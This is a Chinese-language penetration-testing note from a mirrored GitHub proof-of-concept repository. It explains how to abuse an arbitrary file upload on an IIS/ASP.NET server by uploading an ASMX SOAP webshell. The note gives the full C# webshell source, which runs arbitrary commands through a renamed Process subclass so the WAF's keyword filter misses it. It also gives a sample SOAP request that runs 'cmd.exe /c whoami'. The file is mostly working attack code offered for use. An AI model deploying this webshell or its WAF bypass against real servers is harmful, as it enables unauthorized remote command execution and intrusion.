admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-30 06:24:22 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/构建ASMX绕过限制WAF达到命令执行.md
东方有鱼名为咸 07ebed33bc
Update 构建ASMX绕过限制WAF达到命令执行.md
2019-10-15 21:38:21 +08:00

118 lines
3.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

### 以下信息来自倾旋知识星球,在此做整理
> 近日在遇到一个WAF目标服务器配置如下
> 1.ASP.NET
> 2.IIS
> 3.Windows
> 4.X WAF
> 5.不允许上传 ASP、ASPX、ASA、CER、....
> 6.任意文件上传漏洞
> 于是想到还有ASMX构建SOAP接口分享给大家以便留存
> 另外WAF还拦截“Process()”于是在C#代码里创建了一个子类继承Process父类然后实例化
![](img/process.png)
```
public class New_Process :Process
{
public New_Process(string s)
{
}
}
Process e = new New_Process("something");
```
```
POST /UploadPath/User/201908221824334713.asmx HTTP/1.1
Host: example.com
Content-Type: text/xml; charset=utf-8
Content-Length: 363
SOAPAction: "http://payloads.online/Test"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<Test xmlns="http://payloads.online/">
<Z1>cmd.exe</Z1>
<Z2>/c whoami</Z2>
</Test>
</soap:Body>
</soap:Envelope>
```
---------------------------------------------------
![](img/ASMX.png)
```
<%@ WebService Language="C#" Class="Service" %>
using System;
using System.Web;
using System.IO;
using System.Net;
using System.Text;
using System.Data;
using System.Data.SqlClient;
using System.Collections.Generic;
using System.Diagnostics;
using System.Web.SessionState;
using System.Web.Services;
using System.Xml;
using System.Web.Services.Protocols;
[WebService(Namespace = "http://payloads.online/")]
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
public class New_Process :Process
{
public New_Process(string s)
{
}
}
public class Service : System.Web.Services.WebService
{
public Service()
{
}
[WebMethod]
public string Test(string Z1,string Z2)
{
String R;
ProcessStartInfo c = new ProcessStartInfo(Z1,Z2);
Process e = new New_Process("something");
StreamReader OT, ER;
c.UseShellExecute = false;
c.RedirectStandardOutput = true;
c.RedirectStandardError = true;
e.StartInfo = c;
e.Start();
OT = e.StandardOutput;
ER = e.StandardError;
e.Close();
R = OT.ReadToEnd() + ER.ReadToEnd();
HttpContext.Current.Response.Clear();
HttpContext.Current.Response.Write("<?xml version=\"1.0\" encoding=\"utf-8\"?>");
HttpContext.Current.Response.Write("<data>");
HttpContext.Current.Response.Write("<![CDATA[");
HttpContext.Current.Response.Write("\x2D\x3E\x7C");
HttpContext.Current.Response.Write(R);
HttpContext.Current.Response.Write("\x7C\x3C\x2D");
HttpContext.Current.Response.Write("]]>");
HttpContext.Current.Response.Write("</data>");
HttpContext.Current.Response.End();
return R;
}
}
```
Reference in New Issue View Git Blame Copy Permalink